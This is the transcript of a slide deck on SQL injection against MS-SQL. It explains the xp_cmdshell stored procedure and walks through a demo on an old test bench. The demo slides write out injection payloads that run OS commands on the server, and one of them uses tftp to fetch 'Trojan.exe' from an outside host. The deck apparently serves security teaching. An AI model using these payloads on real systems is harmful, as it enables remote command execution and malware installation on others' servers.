Sql injection exploit
-
Upload
varunduggal457 -
Category
Documents
-
view
1.229 -
download
3
Transcript of Sql injection exploit
![Page 1: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/1.jpg)
Advanced Exploitation
using SQL Injection
By Varun Duggal
Work in Application Security Domain
![Page 2: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/2.jpg)
SQL Injection The ability to inject SQL commands into the database engine through an
existing application
SQL Injection occurs when user-supplied data is sent to an interpreter as part of a command or query
Attackers trick the interpreter into executing unintended commands via supplying specially crafted data
Injection flaws allow attackers to create, read, update, or delete any arbitrary data available to the application
![Page 3: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/3.jpg)
Vulnerable Applications Almost all SQL databases and programming languages are potentially
vulnerable
MS SQL Server, Oracle, MySQL, Postgres, DB2, MS Access, Sybase, Informix, etc
Accessed through applications developed using:
Perl and CGI scripts that access databases
ASP, JSP, PHP
XML, XSL and XSQL
Javascript
VB, MFC, and other ODBC-based tools and APIs
DB specific Web-based applications and API‟s
Reports and DB Applications
3 and 4GL-based languages (C, OCI, Pro*C, and COBOL)
many more
![Page 4: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/4.jpg)
Stored procedure
A stored procedure is a subroutine available to applications accessing a relational database system
Stored procedures (sometimes called a sproc or SP) are actually stored in the database data dictionary
![Page 5: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/5.jpg)
Exploiting the Vulnerability
xp_cmdshell stored procedure, which is built into MS-SQL by Default
Allows users to execute operating system commands
![Page 6: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/6.jpg)
Tasks
Executing any type OS commands
Ping Server
Directory Listing
Create File
Defacing Website
Execute Applications
Upload and Download files
![Page 7: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/7.jpg)
More Stored Procedures (xp_cmdshell)
(xp_regread)
(xp_servicecontrol)
(xp_availablemedia)
(xp_enumdsn)
(xp_loginconfig)
(xp_makecab)
(xp_ntsec_enumdomains)
(xp_terminate_process)
![Page 8: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/8.jpg)
Demo
Test Bench
O. S : Windows XP Professional
Frontend: ASP
Backend: MSSQL 2000
Web Server: IIS 5.0
![Page 10: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/10.jpg)
Checking Vulnerable or Not Enter a single quote in the id parameter the error message indicates
it‟s vulnerable to SQL Injection.
![Page 11: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/11.jpg)
Now open the URL and run the command
„;exec master..xp_cmdshell “ ipconfig > c:\inetpub\wwwroot\test.txt”--
![Page 12: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/12.jpg)
Now finally file created on the web server access that file as shown in the below snapshot:
![Page 13: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/13.jpg)
Upload a file on the server
Open tftp server containing malicious code to be uploaded
![Page 14: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/14.jpg)
Now open the URL and run the command
„;exec master..xp_cmdshell “tftp –i 192.168.1.5 GET Trojan.exe C:\Trojan.exe”--
![Page 15: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/15.jpg)
Logs of Tftp shows file gets uploaded on the server